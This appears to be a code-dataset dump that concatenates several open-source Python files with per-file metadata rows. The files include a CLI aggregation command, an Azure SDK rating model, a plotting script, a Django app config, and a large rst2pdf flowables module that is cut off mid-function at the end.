event = self.base(device, netbox, subid, varmap,
alert_type or self.end_type)
event.state = event.STATE_END
return event
def notify(self, device=None, netbox=None, subid='', varmap=None,
alert_type=None):
"""Creates and returns a stateless event"""
event = self.base(device, netbox, subid, varmap,
alert_type or self.start_type)
event.event_type = event.STATE_STATELESS
return event
|
gpl-3.0
| -7,836,915,006,604,692,000
| 35.605769
| 79
| 0.628054
| false
| 4.076017
| false
| false
| false
|
frozflame/molbiox
|
molbiox/execute/relational.py
|
1
|
3111
|
#!/usr/bin/env python3
# coding: utf-8
from __future__ import unicode_literals, print_function
import sys
import itertools
from molbiox.frame.command import Command
from molbiox.io import blast, tabular
"""
If your results come from more than 2 columns, use a SQL database instead.
"""
class CommandAggregate(Command):
abbr = 'ag'
name = 'aggregate'
desc = 'apply an aggregation function to a tabular text file'
@classmethod
def register(cls, subparser):
subparser = super(cls, cls).register(subparser)
subparser.add_argument(
'--subsep', metavar='character',
help="seperator used on subject names")
subparser.add_argument(
'-f', '--function', metavar='string', default='count',
choices=['count', 'list', 'set', 'avg', 'var', 'std'],
help='name of the aggregation function')
subparser.add_argument(
'-k', '--key', metavar='integer', default=0,
help='group by this column ')
subparser.add_argument(
'-v', '--val', metavar='integer', default=0,
help='apply aggregation function on this column')
subparser.add_argument(
'--ksort', metavar='string', choices=['alpha', 'num'],
help='sort keys alphabetically or numerically')
subparser.add_argument(
'--vsort', metavar='string', choices=['alpha', 'num'],
help='sort values alphabetically or numerically')
subparser.add_argument(
'-m', '--limit', type=int,
help='set max number of hits listed for each query')
return subparser
@classmethod
def render(cls, args, outfile):
recgens = [tabular.read(fn) for fn in args.filenames]
records = itertools.chain(*recgens)
aggregator = tabular.Aggregator(aggregator)
if args.function == 'count':
# groups = aggregator
pass
@classmethod
def render_(cls, args, outfile):
if args.format != '6m':
sys.exit('currently only blast6mini')
# TODO: decide what func to use based on -f option
func = blast.read_fmt6m
# a list of generators, then chain them
recgens = [func(fn) for fn in args.filenames]
records = itertools.chain(*recgens)
querydic = blast.aggregate(records, subsep=args.subsep)
if args.sort:
pairs = ((k, querydic[k]) for k in sorted(querydic))
else:
pairs = ((k, querydic[k]) for k in querydic)
if args.list:
for k, v in pairs:
v = sorted(v) if args.sort else v
v = itertools.islice(v, args.limit) if args.limit else v
subj = ' '.join(v)
print(k, subj, sep='\t', file=outfile)
else:
for k, v in querydic.items():
print(len(v), k, sep='\t', file=outfile)
@classmethod
def get_agg_func(cls, name):
"""
Get a function which returns a dict-like object
:param name:
:return:
"""
pass
|
gpl-2.0
| 1,638,024,055,608,239,600
| 32.095745
| 74
| 0.573449
| false
| 4.04026
| false
| false
| false
|
Azure/azure-sdk-for-python
|
sdk/cognitiveservices/azure-cognitiveservices-search-visualsearch/azure/cognitiveservices/search/visualsearch/models/rating.py
|
1
|
2017
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .properties_item import PropertiesItem
class Rating(PropertiesItem):
"""Defines a rating.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AggregateRating
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:ivar text: Text representation of an item.
:vartype text: str
:param _type: Required. Constant filled by server.
:type _type: str
:param rating_value: Required. The mean (average) rating. The possible
values are 1.0 through 5.0.
:type rating_value: float
:ivar best_rating: The highest rated review. The possible values are 1.0
through 5.0.
:vartype best_rating: float
"""
_validation = {
'text': {'readonly': True},
'_type': {'required': True},
'rating_value': {'required': True},
'best_rating': {'readonly': True},
}
_attribute_map = {
'text': {'key': 'text', 'type': 'str'},
'_type': {'key': '_type', 'type': 'str'},
'rating_value': {'key': 'ratingValue', 'type': 'float'},
'best_rating': {'key': 'bestRating', 'type': 'float'},
}
_subtype_map = {
'_type': {'AggregateRating': 'AggregateRating'}
}
def __init__(self, **kwargs):
super(Rating, self).__init__(**kwargs)
self.rating_value = kwargs.get('rating_value', None)
self.best_rating = None
self._type = 'Rating'
|
mit
| -4,623,109,599,950,055,000
| 32.616667
| 79
| 0.584036
| false
| 4.228512
| false
| false
| false
|
Wang-Sen/bdmap-app
|
draw.py
|
1
|
1436
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import datetime
import matplotlib.pyplot as plt
import argparse
import os
if __name__=='__main__':
parser = argparse.ArgumentParser(description='Draw pictures based on the data of input file.')
parser.add_argument('-i', '--ifile', type=str, required=True)
parser.add_argument('-o', '--opath', type=str, required=True)
parser.add_argument('-t', '--title', type=str, required=True)
args = parser.parse_args()
x = []
y = []
old_date = ''
cur_date = ''
with open(args.ifile, 'r') as f:
for i in f.readlines():
data = i.split()
if data[0] != cur_date:
old_date = cur_date
cur_date = data[0]
if x and y:
plt.plot(x, y, label=data[0])
plt.gcf().autofmt_xdate()
plt.title(args.title + ' ' + old_date)
plt.savefig(os.path.join(args.opath, args.title + old_date + '.jpg'))
plt.clf()
x = []
y = []
x.append(datetime.datetime.strptime(data[0] + ' ' + data[1], '%Y-%m-%d %H:%M:%S'))
y.append(data[2])
plt.plot(x, y, label=data[0])
plt.gcf().autofmt_xdate()
plt.title(args.title + ' ' + cur_date)
plt.savefig(os.path.join(args.opath, args.title + cur_date + '.jpg'))
plt.clf()
|
gpl-3.0
| -5,511,461,292,612,271,000
| 34.02439
| 98
| 0.501393
| false
| 3.402844
| false
| false
| false
|
wcong/ants
|
ants/http/request/rpc.py
|
1
|
1073
|
"""
This module implements the XmlRpcRequest class which is a more convenient class
(that Request) to generate xml-rpc requests.
See documentation in docs/topics/request-response.rst
"""
import xmlrpclib
from ants.http.request import Request
from ants.utils.python import get_func_args
DUMPS_ARGS = get_func_args(xmlrpclib.dumps)
class XmlRpcRequest(Request):
def __init__(self, *args, **kwargs):
encoding = kwargs.get('encoding', None)
if 'body' not in kwargs and 'params' in kwargs:
kw = dict((k, kwargs.pop(k)) for k in DUMPS_ARGS if k in kwargs)
kwargs['body'] = xmlrpclib.dumps(**kw)
# spec defines that requests must use POST method
kwargs.setdefault('method', 'POST')
# xmlrpc query multiples times over the same url
kwargs.setdefault('dont_filter', True)
# restore encoding
if encoding is not None:
kwargs['encoding'] = encoding
super(XmlRpcRequest, self).__init__(*args, **kwargs)
self.headers.setdefault('Content-Type', 'text/xml')
|
bsd-3-clause
| 4,317,994,134,569,879,000
| 29.657143
| 79
| 0.661696
| false
| 3.988848
| false
| false
| false
|
tulsluper/sanscript
|
apps/da/apps.py
|
1
|
2212
|
import os
from django.apps import AppConfig
from django.apps import apps
def samevalues(names):
records = []
for name in names:
if type(name) == str:
records.append({key: name for key in ['label', 'model', 'title']})
return records
pages = [
{'label': 'capacity', 'view': 'capacity', 'title': 'Capacity'},
{'label': 'capacity_history', 'view': 'capacity_history', 'title': 'Capacity History'},
{'label': 'pd_types_capacity', 'view': 'pd_types_capacity', 'title': 'PD Capacity'},
{'label': 'pd_types_quantity', 'view': 'pd_types_quantity', 'title': 'PD Quantity'},
{'label': 'capacity_3par', 'view': 'capacity_3par', 'title': '3PAR Capacity'},
{'label': 'capacity_3par_history', 'view': 'capacity_3par_history', 'title': '3PAR Capacity History'},
{'label': 'volumes', 'view': 'volumes', 'title': 'Volumes'},
{'label': 'hosts', 'view': 'hosts', 'title': 'Hosts'},
{'label': 'hosts_capacity', 'view': 'hosts_capacity', 'title': 'HostsCapacity'},
{'label': 'hosts_capacity_history', 'view': 'hosts_capacity_history', 'title': 'HostsCapacityHistory'},
{'label': 'changes', 'view': 'changes', 'title': 'Changes'},
{'label': 'change_acknowledge', 'view': 'change_acknowledge', 'title': ''},
{'label': 'change_delete', 'view': 'change_delete', 'title': ''},
]
commands = [
{'label': 'test_connections', 'title': 'Test connections'},
{'label': 'collect_data', 'title': 'Collect data'},
]
config_models = samevalues([
'StorageConnection',
])
show_models = samevalues([
'StorageConnection',
'Capacity',
'CapacityHistory',
'TPARCapacity',
'TPARCapacityHistory',
'PDTypesCapacity',
'PDTypesQuantity',
'TPARHost',
'TPARVV',
'TPARVLUN',
'EVAVdisk',
'EVAHost',
'HDSHost',
'HDSLU',
'HDSMap',
'Volume',
'Host',
'HostCapacity',
'HostCapacityHistory',
'VolumeChange',
])
class appAppConfig(AppConfig):
label = os.path.basename(os.path.dirname(os.path.realpath(__file__)))
name = 'apps.{}'.format(label)
verbose_name = 'Storages'
pages = pages
commands = commands
config_models = config_models
show_models = show_models
|
gpl-3.0
| -1,206,674,240,758,519,800
| 30.6
| 107
| 0.607595
| false
| 3.429457
| true
| false
| false
|
rst2pdf/rst2pdf
|
doc/assets/flowables.py
|
1
|
38576
|
# -*- coding: utf-8 -*-
# See LICENSE.txt for licensing terms
__docformat__ = 'reStructuredText'
from copy import copy
import re
import sys
from xml.sax.saxutils import unescape
from reportlab.lib.enums import TA_CENTER, TA_RIGHT
from reportlab.lib.styles import ParagraphStyle
from reportlab.lib.units import cm
from reportlab.platypus.doctemplate import FrameActionFlowable, FrameBreak, Indenter
from reportlab.platypus.flowables import (
_listWrapOn,
_FUZZ,
Flowable,
NullDraw,
PageBreak,
Spacer,
)
from reportlab.platypus.frames import Frame
from reportlab.platypus.paragraph import Paragraph
from reportlab.platypus.tables import Table, TableStyle
from reportlab.platypus.tableofcontents import TableOfContents
from reportlab.platypus.xpreformatted import XPreformatted
from . import styles
from .log import log
class XXPreformatted(XPreformatted):
"""An extended XPreformattedFit"""
def __init__(self, *args, **kwargs):
XPreformatted.__init__(self, *args, **kwargs)
def split(self, aW, aH):
# Figure out a nice range of splits
#
# Assume we would prefer 5 lines (at least) on
# a splitted flowable before a break, and 4 on
# the last flowable after a break.
# So, the minimum wrap height for a fragment
# will be 5*leading
rW, rH = self.wrap(aW, aH)
if rH > aH:
minH1 = getattr(self.style, 'allowOrphans', 5) * self.style.leading
minH2 = getattr(self.style, 'allowWidows', 4) * self.style.leading
# If there's no way to fid a decent fragment,
# refuse to split
if aH < minH1:
return []
# Now, don't split too close to the end either
pw, ph = self.wrap(aW, aH)
if ph - aH < minH2:
aH = ph - minH2
return XPreformatted.split(self, aW, aH)
class MyIndenter(Indenter):
"""An indenter that has a width, because otherwise you get crashes
if added inside tables"""
width = 0
height = 0
def draw(self):
pass
class TocEntry(NullDraw):
"""A flowable that adds a TOC entry but draws nothing"""
def __init__(self, level, label):
self.level = level
self.label = label
self.width = 0
self.height = 0
self.keepWithNext = True
def draw(self):
# Add outline entry
self.canv.bookmarkHorizontal(self.label, 0, 0 + self.height)
self.canv.addOutlineEntry(
self.label, self.label, max(0, int(self.level)), False
)
class Heading(Paragraph):
"""A paragraph that also adds an outline entry in
the PDF TOC."""
def __init__(
self,
text,
style,
bulletText=None,
caseSensitive=1,
level=0,
snum=None,
parent_id=None,
node=None,
section_header_depth=2,
):
# Issue 114: need to convert "&" to "&" and such.
# Issue 140: need to make it plain text
self.stext = re.sub(r'<[^>]*?>', '', unescape(text))
self.stext = self.stext.strip()
self.level = int(level)
self.snum = snum
self.parent_id = parent_id
self.node = node
self.section_header_depth = section_header_depth
Paragraph.__init__(self, text, style, bulletText)
def draw(self):
# Add outline entry
self.canv.bookmarkHorizontal(self.parent_id, 0, 0 + self.height)
# self.section_header_depth is for Issue 391
if self.canv.firstSect and self.level < self.section_header_depth:
self.canv.sectName = self.stext
self.canv.firstSect = False
if self.snum is not None:
self.canv.sectNum = self.snum
else:
self.canv.sectNum = ""
self.canv.addOutlineEntry(self.stext, self.parent_id, int(self.level), False)
Paragraph.draw(self)
class Separation(Flowable):
"""A simple <hr>-like flowable"""
def wrap(self, w, h):
self.w = w
return w, 1 * cm
def draw(self):
self.canv.line(0, 0.5 * cm, self.w, 0.5 * cm)
class Reference(Flowable):
"""A flowable to insert an anchor without taking space"""
def __init__(self, refid):
self.refid = refid
self.keepWithNext = True
Flowable.__init__(self)
def wrap(self, w, h):
"""This takes no space"""
return 0, 0
def draw(self):
self.canv.bookmarkPage(self.refid)
def repr(self):
return "Reference: %s" % self.refid
def __str__(self):
return "Reference: %s" % self.refid
class OddEven(Flowable):
"""This flowable takes two lists of flowables as arguments, odd and even.
If will draw the "odd" list when drawn in odd pages and the "even" list on
even pages.
wrap() will always return a size large enough for both lists, and this flowable
**cannot** be split, so use with care.
"""
def __init__(self, odd, even, style=None):
self.odd = DelayedTable([[odd]], ['100%'], style)
self.even = DelayedTable([[even]], ['100%'], style)
def wrap(self, w, h):
"""Return a box large enough for both odd and even"""
w1, h1 = self.odd.wrap(w, h)
w2, h2 = self.even.wrap(w, h)
return max(w1, w2), max(h1, h2)
def drawOn(self, canvas, x, y, _sW=0):
if canvas._pagenum % 2 == 0:
self.even.drawOn(canvas, x, y, _sW)
else:
self.odd.drawOn(canvas, x, y, _sW)
def split(self):
"""Makes no sense to split this..."""
return []
class DelayedTable(Table):
"""A flowable that inserts a table for which it has the data.
Needed so column widths can be determined after we know on what frame
the table will be inserted, thus making the overal table width correct.
"""
def __init__(self, data, colWidths, style=None, repeatrows=False, splitByRow=True):
self.data = data
self._colWidths = colWidths
if style is None:
style = TableStyle(
[
('LEFTPADDING', (0, 0), (-1, -1), 0),
('RIGHTPADDING', (0, 0), (-1, -1), 0),
('TOPPADDING', (0, 0), (-1, -1), 0),
('BOTTOMPADDING', (0, 0), (-1, -1), 0),
]
)
self.style = style
self.t = None
self.repeatrows = repeatrows
self.hAlign = TA_CENTER
self.splitByRow = splitByRow
def wrap(self, w, h):
# Create the table, with the widths from colWidths reinterpreted
# if needed as percentages of frame/cell/whatever width w is.
# _tw = w/sum(self.colWidths)
def adjust(*args, **kwargs):
kwargs['total'] = w
return styles.adjustUnits(*args, **kwargs)
# adjust=functools.partial(styles.adjustUnits, total=w)
self.colWidths = [adjust(x) for x in self._colWidths]
# colWidths = [_w * _tw for _w in self.colWidths]
self.t = Table(
self.data,
colWidths=self.colWidths,
style=self.style,
repeatRows=self.repeatrows,
splitByRow=True,
)
# splitByRow=self.splitByRow)
self.t.hAlign = self.hAlign
return self.t.wrap(w, h)
def split(self, w, h):
if self.splitByRow:
if not self.t:
self.wrap(w, h)
return self.t.split(w, h)
else:
return []
def drawOn(self, canvas, x, y, _sW=0):
self.t.drawOn(canvas, x, y, _sW)
def identity(self, maxLen=None):
return "<%s at %s%s%s> containing: %s" % (
self.__class__.__name__,
hex(id(self)),
self._frameName(),
getattr(self, 'name', '')
and (' name="%s"' % getattr(self, 'name', ''))
or '',
repr(self.data[0]),
)[:180]
def tablepadding(padding):
if not isinstance(padding, (list, tuple)):
padding = [padding] * 4
return (
padding,
('TOPPADDING', [0, 0], [-1, -1], padding[0]),
('RIGHTPADDING', [-1, 0], [-1, -1], padding[1]),
('BOTTOMPADDING', [0, 0], [-1, -1], padding[2]),
('LEFTPADDING', [1, 0], [1, -1], padding[3]),
)
class SplitTable(DelayedTable):
def __init__(self, data, colWidths, style, padding=3):
if len(data) != 1 or len(data[0]) != 2:
log.error('SplitTable can only be 1 row and two columns!')
sys.exit(1)
DelayedTable.__init__(self, data, colWidths, style)
self.padding, p1, p2, p3, p4 = tablepadding(padding)
self.style._cmds.insert(0, p1)
self.style._cmds.insert(0, p2)
self.style._cmds.insert(0, p3)
self.style._cmds.insert(0, p4)
def identity(self, maxLen=None):
return "<%s at %s%s%s> containing: %s" % (
self.__class__.__name__,
hex(id(self)),
self._frameName(),
getattr(self, 'name', '')
and (' name="%s"' % getattr(self, 'name', ''))
or '',
repr(self.data[0][1])[:180],
)
def split(self, w, h):
_w, _h = self.wrap(w, h)
if _h > h: # Can't split!
# The right column data mandates the split
# Find which flowable exceeds the available height
dw = self.colWidths[0] + self.padding[1] + self.padding[3]
dh = self.padding[0] + self.padding[2]
bullet = self.data[0][0]
text = self.data[0][1]
for l in range(0, len(text)):
_, fh = _listWrapOn(text[: l + 1], w - dw, None)
if fh + dh > h:
# The lth flowable is the guilty one
# split it
_, lh = _listWrapOn(text[:l], w - dw, None)
# Workaround for Issue 180
text[l].wrap(w - dw, h - lh - dh)
l2 = text[l].split(w - dw, h - lh - dh)
if l2 == []: # Not splittable, push some to next page
if l == 0: # Can't fit anything, push all to next page
return l2
# We reduce the number of items we keep on the
# page for two reasons:
# 1) If an item is associated with the following
# item (getKeepWithNext() == True), we have
# to back up to a previous one.
# 2) If we miscalculated the size required on
# the first page (I dunno why, probably not
# counting borders properly, but we do
# miscalculate occasionally). Seems to
# have to do with nested tables, so it might
# be the extra space on the border on the
# inner table.
while l > 0:
if not text[l - 1].getKeepWithNext():
first_t = Table(
[[bullet, text[:l]]],
colWidths=self.colWidths,
style=self.style,
)
_w, _h = first_t.wrap(w, h)
if _h <= h:
break
l -= 1
if l > 0:
# Workaround for Issue 180 with wordaxe:
# if wordaxe is not None:
# l3=[Table([
# [bullet,
# text[:l]]
# ],
# colWidths=self.colWidths,
# style=self.style),
# Table([['',text[l:]]],
# colWidths=self.colWidths,
# style=self.style)]
# else:
l3 = [
first_t,
SplitTable(
[['', text[l:]]],
colWidths=self.colWidths,
style=self.style,
padding=self.padding,
),
]
else: # Everything flows
l3 = []
else:
l3 = [
Table(
[[bullet, text[:l] + [l2[0]]]],
colWidths=self.colWidths,
rowHeights=[h],
style=self.style,
)
]
if l2[1:] + text[l + 1 :]:
l3.append(
SplitTable(
[['', l2[1:] + text[l + 1 :]]],
colWidths=self.colWidths,
style=self.style,
padding=self.padding,
)
)
return l3
log.debug("Can't split splittable")
return self.t.split(w, h)
else:
return DelayedTable.split(self, w, h)
class MySpacer(Spacer):
def wrap(self, aW, aH):
w, h = Spacer.wrap(self, aW, aH)
self.height = min(aH, h)
return w, self.height
class MyPageBreak(FrameActionFlowable):
def __init__(self, templateName=None, breakTo='any'):
"""templateName switches the page template starting in the
next page.
breakTo can be 'any' 'even' or 'odd'.
'even' will break one page if the current page is odd
or two pages if it's even. That way the next flowable
will be in an even page.
'odd' is the opposite of 'even'
'any' is the default, and means it will always break
only one page.
"""
self.templateName = templateName
self.breakTo = breakTo
self.forced = False
self.extraContent = []
def frameAction(self, frame):
frame._generated_content = []
if self.breakTo == 'any': # Break only once. None if at top of page
if not frame._atTop:
frame._generated_content.append(SetNextTemplate(self.templateName))
frame._generated_content.append(PageBreak())
elif self.breakTo == 'odd': # Break once if on even page, twice
# on odd page, none if on top of odd page
if frame._pagenum % 2: # odd pageNum
if not frame._atTop:
# Blank pages get no heading or footer
frame._generated_content.append(SetNextTemplate(self.templateName))
frame._generated_content.append(SetNextTemplate('emptyPage'))
frame._generated_content.append(PageBreak())
frame._generated_content.append(ResetNextTemplate())
frame._generated_content.append(PageBreak())
else: # even
frame._generated_content.append(SetNextTemplate(self.templateName))
frame._generated_content.append(PageBreak())
elif self.breakTo == 'even': # Break once if on odd page, twice
# on even page, none if on top of even page
if frame._pagenum % 2: # odd pageNum
frame._generated_content.append(SetNextTemplate(self.templateName))
frame._generated_content.append(PageBreak())
else: # even
if not frame._atTop:
# Blank pages get no heading or footer
frame._generated_content.append(SetNextTemplate(self.templateName))
frame._generated_content.append(SetNextTemplate('emptyPage'))
frame._generated_content.append(PageBreak())
frame._generated_content.append(ResetNextTemplate())
frame._generated_content.append(PageBreak())
class SetNextTemplate(Flowable):
"""Set canv.templateName when drawing.
rst2pdf uses that to switch page templates.
"""
def __init__(self, templateName=None):
self.templateName = templateName
Flowable.__init__(self)
def draw(self):
if self.templateName:
try:
self.canv.oldTemplateName = self.canv.templateName
except Exception:
self.canv.oldTemplateName = 'oneColumn'
self.canv.templateName = self.templateName
class ResetNextTemplate(Flowable):
"""Go back to the previous template.
rst2pdf uses that to switch page templates back when
temporarily it needed to switch to another template.
For example, after a OddPageBreak, there can be a totally
blank page. Those have to use coverPage as a template,
because they must not have headers or footers.
And then we need to switch back to whatever was used.
"""
def __init__(self):
Flowable.__init__(self)
def draw(self):
self.canv.templateName, self.canv.oldTemplateName = (
self.canv.oldTemplateName,
self.canv.templateName,
)
def wrap(self, aW, aH):
return 0, 0
class TextAnnotation(Flowable):
"""Add text annotation flowable"""
def __init__(self, *args):
self.annotationText = ""
self.position = [-1, -1, -1, -1]
if len(args) >= 1:
self.annotationText = args[0].lstrip('"').rstrip('"')
if len(args) >= 5:
self.position = args[1:]
def wrap(self, w, h):
return 0, 0
def draw(self):
# Format of Reportlab's textAnnotation():
# textAnnotation("Your content", Rect=[x_begin, y_begin, x_end, y_end], relative=1)
self.canv.textAnnotation(self.annotationText, self.position, 1)
class Transition(Flowable):
"""Wrap canvas.setPageTransition.
Sets the transition effect from the current page to the next.
"""
PageTransitionEffects = dict(
Split=['direction', 'motion'],
Blinds=['dimension'],
Box=['motion'],
Wipe=['direction'],
Dissolve=[],
Glitter=['direction'],
)
def __init__(self, *args):
if len(args) < 1:
args = [None, 1] # No transition
# See if we got a valid transition effect name
if args[0] not in self.PageTransitionEffects:
log.error('Unknown transition effect name: %s' % args[0])
args[0] = None
elif len(args) == 1:
args.append(1)
# FIXME: validate more
self.args = args
def wrap(self, aw, ah):
return 0, 0
def draw(self):
kwargs = dict(
effectname=None, duration=1, direction=0, dimension='H', motion='I'
)
ceff = ['effectname', 'duration'] + self.PageTransitionEffects[self.args[0]]
for argname, argvalue in zip(ceff, self.args):
kwargs[argname] = argvalue
kwargs['duration'] = int(kwargs['duration'])
kwargs['direction'] = int(kwargs['direction'])
self.canv.setPageTransition(**kwargs)
class SmartFrame(Frame):
"""A (Hopefully) smarter frame object.
This frame object knows how to handle a two-pass
layout procedure (someday).
"""
def __init__(
self,
container,
x1,
y1,
width,
height,
leftPadding=6,
bottomPadding=6,
rightPadding=6,
topPadding=6,
id=None,
showBoundary=0,
overlapAttachedSpace=None,
_debug=None,
):
self.container = container
self.onSidebar = False
self.__s = '[%s, %s, %s, %s, %s, %s, %s, %s,]' % (
x1,
y1,
width,
height,
leftPadding,
bottomPadding,
rightPadding,
topPadding,
)
Frame.__init__(
self,
x1,
y1,
width,
height,
leftPadding,
bottomPadding,
rightPadding,
topPadding,
id,
showBoundary,
overlapAttachedSpace,
_debug,
)
def add(self, flowable, canv, trySplit=0):
flowable._atTop = self._atTop
return Frame.add(self, flowable, canv, trySplit)
def __repr__(self):
return self.__s
def __deepcopy__(self, *whatever):
return copy(self)
class FrameCutter(FrameActionFlowable):
def __init__(self, dx, width, flowable, padding, lpad, floatLeft=True):
self.width = width
self.dx = dx
self.f = flowable
self.padding = padding
self.lpad = lpad
self.floatLeft = floatLeft
def frameAction(self, frame):
idx = frame.container.frames.index(frame)
if self.floatLeft:
# Don't bother inserting a silly thin frame
if self.width - self.padding > 30:
f1 = SmartFrame(
frame.container,
frame._x1 + self.dx - 2 * self.padding,
frame._y2 - self.f.height - 3 * self.padding,
self.width + 2 * self.padding,
self.f.height + 3 * self.padding,
bottomPadding=0,
topPadding=0,
leftPadding=self.lpad,
)
f1._atTop = frame._atTop
# This is a frame next to a sidebar.
f1.onSidebar = True
frame.container.frames.insert(idx + 1, f1)
# Don't add silly thin frame
if frame._height - self.f.height - 2 * self.padding > 30:
frame.container.frames.insert(
idx + 2,
SmartFrame(
frame.container,
frame._x1,
frame._y1p,
self.width + self.dx,
frame._height - self.f.height - 3 * self.padding,
topPadding=0,
),
)
else:
# Don't bother inserting a silly thin frame
if self.width - self.padding > 30:
f1 = SmartFrame(
frame.container,
frame._x1 - self.width,
frame._y2 - self.f.height - 2 * self.padding,
self.width,
self.f.height + 2 * self.padding,
bottomPadding=0,
topPadding=0,
rightPadding=self.lpad,
)
f1._atTop = frame._atTop
# This is a frame next to a sidebar.
f1.onSidebar = True
frame.container.frames.insert(idx + 1, f1)
if frame._height - self.f.height - 2 * self.padding > 30:
frame.container.frames.insert(
idx + 2,
SmartFrame(
frame.container,
frame._x1 - self.width,
frame._y1p,
self.width + self.dx,
frame._height - self.f.height - 2 * self.padding,
topPadding=0,
),
)
class Sidebar(FrameActionFlowable):
def __init__(self, flowables, style):
self.style = style
self.width = self.style.width
self.flowables = flowables
def frameAction(self, frame):
if self.style.float not in ('left', 'right'):
return
if frame.onSidebar: # We are still on the frame next to a sidebar!
frame._generated_content = [FrameBreak(), self]
else:
w = frame.container.styles.adjustUnits(self.width, frame.width)
idx = frame.container.frames.index(frame)
padding = self.style.borderPadding
width = self.style.width
self.style.padding = frame.container.styles.adjustUnits(
str(padding), frame.width
)
self.style.width = frame.container.styles.adjustUnits(
str(width), frame.width
)
self.kif = BoxedContainer(self.flowables, self.style)
if self.style.float == 'left':
self.style.lpad = frame.leftPadding
f1 = SmartFrame(
frame.container,
frame._x1,
frame._y1p,
w - 2 * self.style.padding,
frame._y - frame._y1p,
leftPadding=self.style.lpad,
rightPadding=0,
bottomPadding=0,
topPadding=0,
)
f1._atTop = frame._atTop
frame.container.frames.insert(idx + 1, f1)
frame._generated_content = [
FrameBreak(),
self.kif,
FrameCutter(
w,
frame.width - w,
self.kif,
padding,
self.style.lpad,
True,
),
FrameBreak(),
]
elif self.style.float == 'right':
self.style.lpad = frame.rightPadding
frame.container.frames.insert(
idx + 1,
SmartFrame(
frame.container,
frame._x1 + frame.width - self.style.width,
frame._y1p,
w,
frame._y - frame._y1p,
rightPadding=self.style.lpad,
leftPadding=0,
bottomPadding=0,
topPadding=0,
),
)
frame._generated_content = [
FrameBreak(),
self.kif,
FrameCutter(
w,
frame.width - w,
self.kif,
padding,
self.style.lpad,
False,
),
FrameBreak(),
]
class BoundByWidth(Flowable):
"""Limit a list of flowables by width.
This still lets the flowables break over pages and frames.
"""
def __init__(self, maxWidth, content=[], style=None, mode=None, scale=None):
self.maxWidth = maxWidth
self.content = content
self.style = style
self.mode = mode
self.pad = None
self.scale = scale
Flowable.__init__(self)
def border_padding(self, useWidth, additional):
sdict = self.style
sdict = sdict.__dict__ or {}
bp = sdict.get("borderPadding", 0)
if useWidth:
additional += sdict.get("borderWidth", 0)
if not isinstance(bp, list):
bp = [bp] * 4
return [x + additional for x in bp]
def identity(self, maxLen=None):
return "<%s at %s%s%s> containing: %s" % (
self.__class__.__name__,
hex(id(self)),
self._frameName(),
getattr(self, 'name', '')
and (' name="%s"' % getattr(self, 'name', ''))
or '',
repr([c.identity() for c in self.content])[:80],
)
def wrap(self, availWidth, availHeight):
"""If we need more width than we have, complain, keep a scale"""
self.pad = self.border_padding(True, 0.1)
maxWidth = float(
min(
styles.adjustUnits(self.maxWidth, availWidth) or availWidth,
availWidth,
)
)
self.maxWidth = maxWidth
maxWidth -= self.pad[1] + self.pad[3]
self.width, self.height = _listWrapOn(
self.content, maxWidth, None, fakeWidth=False
)
if self.width > maxWidth:
if self.mode != 'shrink':
self.scale = 1.0
log.warning(
"BoundByWidth too wide to fit in frame (%s > %s): %s",
self.width,
maxWidth,
self.identity(),
)
if self.mode == 'shrink' and not self.scale:
self.scale = (maxWidth + self.pad[1] + self.pad[3]) / (
self.width + self.pad[1] + self.pad[3]
)
else:
self.scale = 1.0
self.height *= self.scale
self.width *= self.scale
return (
self.width,
self.height + (self.pad[0] + self.pad[2]) * self.scale,
)
def split(self, availWidth, availHeight):
if not self.pad:
self.wrap(availWidth, availHeight)
content = self.content
if len(self.content) == 1:
# We need to split the only element we have
content = content[0].split(
availWidth - (self.pad[1] + self.pad[3]),
availHeight - (self.pad[0] + self.pad[2]),
)
result = [
BoundByWidth(self.maxWidth, [f], self.style, self.mode, self.scale)
for f in content
]
return result
def draw(self):
"""we simulate being added to a frame"""
canv = self.canv
canv.saveState()
x = canv._x
y = canv._y
_sW = 0
scale = self.scale
content = None
# , canv, x, y, _sW=0, scale=1.0, content=None, aW=None):
pS = 0
aW = self.width
aW = scale * (aW + _sW)
if content is None:
content = self.content
y += (self.height + self.pad[2]) / scale
x += self.pad[3]
for c in content:
w, h = c.wrapOn(canv, aW, 0xFFFFFFF)
if (w < _FUZZ or h < _FUZZ) and not getattr(c, '_ZEROSIZE', None):
continue
if c is not content[0]:
h += max(c.getSpaceBefore() - pS, 0)
y -= h
canv.saveState()
if self.mode == 'shrink':
canv.scale(scale, scale)
elif self.mode == 'truncate':
p = canv.beginPath()
p.rect(
x - self.pad[3],
y - self.pad[2],
self.maxWidth,
self.height + self.pad[0] + self.pad[2],
)
canv.clipPath(p, stroke=0)
c.drawOn(canv, x, y, _sW=aW - w)
canv.restoreState()
if c is not content[-1]:
pS = c.getSpaceAfter()
y -= pS
canv.restoreState()
class BoxedContainer(BoundByWidth):
def __init__(self, content, style, mode='shrink'):
try:
w = style.width
except AttributeError:
w = '100%'
BoundByWidth.__init__(self, w, content, mode=mode, style=None)
self.style = style
self.mode = mode
def identity(self, maxLen=None):
return repr(
['BoxedContainer containing: ', [c.identity() for c in self.content]]
)[:80]
def draw(self):
canv = self.canv
canv.saveState()
x = canv._x
y = canv._y
lw = 0
if self.style and self.style.borderWidth > 0:
lw = self.style.borderWidth
canv.setLineWidth(self.style.borderWidth)
if self.style.borderColor: # This could be None :-(
canv.setStrokeColor(self.style.borderColor)
stroke = 1
else:
stroke = 0
else:
stroke = 0
if self.style and self.style.backColor:
canv.setFillColor(self.style.backColor)
fill = 1
else:
fill = 0
padding = self.border_padding(False, lw)
xpadding = padding[1] + padding[3]
ypadding = padding[0] + padding[2]
p = canv.beginPath()
p.rect(x, y, self.width + xpadding, self.height + ypadding)
canv.drawPath(p, stroke=stroke, fill=fill)
canv.restoreState()
BoundByWidth.draw(self)
def split(self, availWidth, availHeight):
self.wrap(availWidth, availHeight)
padding = (self.pad[1] + self.pad[3]) * self.scale
if self.height + padding <= availHeight:
return [self]
else:
# Try to figure out how many elements
# we can put in the available space
candidate = None
remainder = None
for p in range(1, len(self.content)):
